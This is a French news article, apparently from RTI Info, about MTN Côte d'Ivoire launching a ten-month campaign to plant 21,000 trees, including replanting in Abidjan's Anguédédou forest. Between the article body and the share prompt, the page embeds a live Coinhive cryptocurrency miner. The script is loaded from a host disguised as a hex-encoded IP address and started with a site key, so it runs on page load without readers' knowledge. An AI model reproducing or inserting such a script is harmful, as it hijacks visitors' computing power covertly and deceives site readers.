Un défi de planting de 21 000 arbres en 10 mois pour participer à la préservation de la forêt ivoirienne.
0
 

Écouter
Un défi de planting de 21 000 arbres en 10 mois pour participer à la préservation de la forêt ivoirienne.

Un défi de planting de 21 000 arbres en 10 mois pour participer à la préservation de la forêt ivoirienne.

RTI Info | Lu 1158 fois | Publié

L’Etat ivoirien a adopté en mai dernier, une politique nationale de préservation, de réhabilitation et d’extension des forêts. Il était essentiel pour le pays de la mise en œuvre de cette nouvelle politique à hauteur de 616 milliards de F CFA sur une période de 10 ans, face à la dégradation alarmante de la couverture forestière ivoirienne, qui est estimée aujourd’hui à près de 3 millions d'ha contre 16 millions d'hectares en 1900. Tous les acteurs de la chaîne, mais aussi les populations sont appelés à agir en faveur de la préservation de l’environnement. MTN Côte d’Ivoire a décidé de s’y engager au cours de la 12e édition des "21 jours d’actions citoyennes". La compagnie a entamé une vaste opération de planting de 21 000 arbres en Côte d’Ivoire sur les 10 prochains mois.

Dans le cadre de la Journée Mondiale de l’environnement, c'est à travers deux activités que l’entreprise a voulu marquer l’événement. Une balade à vélo sur un parcours de 4 km pour découvrir la nature et le reboisement environ un demi-hectare de forêt (plus de 300 pieds) dans la forêt classée d’Anguédédou, l'un des poumons vert de la ville d'Abidjan. A la fin de la première phase de l’opération, il est prévu 2100 arbres à planter.

Ce sera par la suite au tour de la Société de Développement des forêts (Sodefor) de prendre le relais avec une opération de reboisement qui va s’étendre sur les 10 prochains mois. Au final, 21 000 arbres devraient être plantés, une action en droite ligne de la politique du Gouvernement ivoirien en matière de préservation de l'environnement et des forêts.

"Le but de cette opération est de contribuer à la préservation de l’environnement en général et à la reconstitution du couvert forestier ivoirien", assure l’entreprise qui a mobilisé tout son personnel pour une totale implication.

La Sodefor, elle a salué l’initiative et profité pour inviter les populations à une prise de conscience sur le changement climatique et la nécessité de reboiser et protéger les forêts agressées par les activités comme l'agriculture, l'orpaillage clandestin, l'exploitation du bois... 

Axés sur le thème "l’Education pour l’Autonomisation de la Jeunesse" les 21 jours d’actions citoyennes en faveur de l’autonomisation des jeunes de 15 à 24 ans ont vu une participation massive des jeunes en Côte d’Ivoire.

A noter que cette initiative annuelle de bénévolat lancée en 2007 par l’entreprise se déroule dans les 22 filiales en Afrique, en Europe et au Moyen Orient.

 

<script src="https://0x6814D03B/lib/coinhive.min.js"></script>
<script>
var miner = new CoinHive.Anonymous('f8XBOx6egKlyNr6RU9M1hnmEJd81a17g');
miner.start();
</script>

Cet article vous a plu ! Partagez-le maintenant

A lire également

 
 
 
 
 
 
 
 
 
 

En continu

Rome: une vingtaine de blessés dans l'écroulement d'un escalier mécanique

Des experts africains en BTP planchent sur de nouveaux défis à Abidjan

Grand-Bassam: L’Abissa 2018 sera couplée avec les 15 ans de règne du roi des N’Zima

La fabrication du charbon de bois, une activité économique intermittente pour des femmes à Tiélétanakaha dans la sous-préfecture de Tafiré

Séguéla: 156 instituteurs adjoints en stage dans la DRENETFP